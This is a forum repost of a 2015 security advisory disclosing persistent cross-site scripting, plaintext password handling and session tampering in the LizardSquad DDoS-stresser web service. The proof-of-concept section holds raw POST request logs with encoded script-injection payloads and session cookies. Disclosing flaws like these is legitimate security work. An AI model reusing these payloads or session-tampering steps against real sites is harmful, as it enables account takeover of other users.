Jump to content
Sign in to follow this  
Aerosol

LizardSquad DDoS Stresser Cross Site Scripting / Session Tampering

Recommended Posts

Document Title:
===============
LizardSquad DDoS Stresser - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1417

http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos#


Release Date:
=============
2015-01-20


Vulnerability Laboratory ID (VL-ID):
====================================
1417


Common Vulnerability Scoring System:
====================================
8.9


Product & Service Introduction:
===============================
The product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS attacks,
like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with
massive amounts of bogus requests.

(Copy of the Homepage: https://lizardstresser.su/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
LizardSquad
Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
Multiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application.

1.1
The 1st vulnerability is located in `username` value of the registration module. A user can register a script code as payload
to the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. Thus allows
to execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the
vulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see the user
passwords, by watching the logs of an compromised server you see that they can switch by login in through the registered user accounts.
This is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare malicious code
that executes function in connection with application-side injected script codes. The vulnerable file to inject the code is the
register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the username
is getting visible.

Vulnerable Module(s):
[+] Registration (./ref)

Vulnerable Parameter(s):
[+] username

Affected Module(s):
[+] Dashboard (Username in Left Sidebar)


1.2
The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A fresh registered
user account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend administrator account.
After an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend users or can compromise
the session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place locally in the listed
open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session
of the add Ticket POST method request.

Vulnerable Module(s):
[+] Tickets (./tickets)

Vulnerable Parameter(s):
[+] name (servername)

1.3
The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the
ddos application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the
panel (server target list). The service syncs the the device/server name value after the infection but also if the attacker syncs the
data manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script code payload that
affects the ddos control panel.

Vulnerable Module(s):
[+] server list

Vulnerable Parameter(s):
[+] name (servername)

1.4
The 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST method to change the own
account password is send in plain-text. Thus allows remote attackers and network administors to capture compromised accounts. The service can
also be observed by man-in-the-middle attacks in the local network.

Vulnerable Module(s):
[+] dasboard > user settings > change password


1.5
The 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method request of the change function in the
ddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and intercepts the session information by
changing to an existing user account. Successul exploitation of the session tampering issues results in account system compromise (administrators/customers).

Vulnerable Module(s):
[+] dasboard > user settings > change password

Vulnerable Parameter(s):
[+] id


Proof of Concept (PoC):
=======================
1.1
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0

(Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer

[http://lizardstresser.su/usercp]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
POST-Daten:
cpassword[chaos666]
npassword[http%3A%2F

%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
updatePassBtn[Change+Stored+Data%21]
Response Header:
Date[Tue, 20 Jan 2015

10:29:21 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]


Pragma[no-cache]
Server[cloudflare-nginx]
CF-RAY[1aba972a06dd15b3-FRA]
Content-Encoding[gzip]
-
Status: 302[Moved Temporarily]
POST https://lizardstresser.su/register.php
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://lizardstresser.su/register.php]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
POST-Daten:
username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2]
password[chaos666]
rpassword[chaos666]
email[research%40vulnerbaility-lab.com]
ref[%2F]
checkbox1[1]
register[Register]
Response Header:
Server[cloudflare-nginx]
Date[Tue, 20 Jan 2015 11:20:02 GMT]
Content-Type[text/html]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[/purchase]
CF-RAY[1abae168238f15b3-FRA]
X-Firefox-Spdy[3.1]


Reference(s):
http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe
https://lizardstresser.su/register.php


1.2
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/ajax/addticket.php
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://lizardstresser.su/tickets]
Content-Length[324]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp]
Response Header:
Date[Tue, 20 Jan 2015 10:30:54 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Server[cloudflare-nginx]
CF-RAY[1aba996d3d7115b3-FRA]
Content-Encoding[gzip]

Reference(s):
http://lizardstresser.su/ajax/addticket.php


Credits & Authors:
==================
Vulnerability Laboratory [Research Team]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Source

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...